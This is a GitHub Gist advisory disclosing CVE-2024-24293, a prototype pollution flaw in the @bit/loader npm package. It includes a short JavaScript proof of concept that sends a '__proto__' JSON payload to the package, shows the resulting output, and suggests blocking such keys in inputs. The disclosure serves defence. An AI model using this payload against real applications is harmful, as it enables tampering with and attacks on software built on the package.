Skip to content

Instantly share code, notes, and snippets.

@tariqhawis
Last active May 18, 2024 03:40
Show Gist options
  • Save tariqhawis/986fb1c9da6be526fb2656ba8d194b7f to your computer and use it in GitHub Desktop.
Save tariqhawis/986fb1c9da6be526fb2656ba8d194b7f to your computer and use it in GitHub Desktop.
(CVE-2024-24293) Prototype Pollution Affecting @bit/loader npm package

Overview

Affected versions of this package are vulnerable to Prototype Pollution where the merge is invoked in M function unsafely Since the infected e argument with proto object missing check if it resolves to the object prototype, the malicious property are then copied on the Object prototype by the merge operation to the empty object and recursively affected all the objects in the program.

PoC

(async () => {
  const lib = await import('@bit/loader');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default (BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

This package has no security updates on the mentioned vulnereability, therefore, users should ensure proper santization and validation over user's supplied inputs. Blocking inputs containing __proto__, contructor.prototype


Update: Disclosed publicly following four months of no response from the maintainer.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment